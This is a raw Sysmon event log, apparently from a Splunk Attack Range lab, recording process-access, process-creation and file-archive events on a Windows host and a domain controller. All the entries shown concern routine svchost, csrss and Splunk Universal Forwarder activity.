12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290983Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000290982Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-01C3-6088-E829-00000000BB01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000290981Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.187{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C3-6088-E829-00000000BB01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000290980Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:23.189{BEA10069-01C3-6088-E829-00000000BB01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291025Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.991{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A176E45C2D53D3466196B2E14258BEF,SHA256=AB45A59748D6ECBDD1FB5EFE172C832EBC491FB5F52C5B094463FB2065E8530E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439572Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:24.045{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57863293B085F9D1F2434DC195427915,SHA256=7DAA4961730326C6955C7C14336EBAA1D75A2734E418CA40E8C3576CE4EB97C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291024Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.806{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5B7A99FAFF2DE3CF80DCE80C7DA02A3,SHA256=40647D163EFC2180D0A99E1DD9B52221358D1D925C184C8E6C7F73469FF22045,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291023Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.590{BEA10069-01C4-6088-EA29-00000000BB01}38406104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291022Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C4-6088-EA29-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291021Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291020Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291019Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291018Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291017Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291016Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.458{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291015Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.457{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291014Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.457{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291013Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.457{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291012Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.457{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-01C4-6088-EA29-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291011Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.457{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C4-6088-EA29-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291010Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.453{BEA10069-01C4-6088-EA29-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000439571Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:24.037{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439570Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:24.037{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439576Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:25.987{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B967B9455E75C56CD54C6E7B3A769F4,SHA256=5B003702858206977C5F760B343C2DCE25CC23A38D154D4BB5246CE984ADA0AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439575Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:25.057{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F811FA29A8FE1DCDAC68EFCA71B4A5,SHA256=36BB6E9EB7376340C49D902DC1AC2159633F50D1DEDA5F5A345797E193330B77,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291051Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C5-6088-EC29-00000000BB01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291050Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291049Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291048Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\n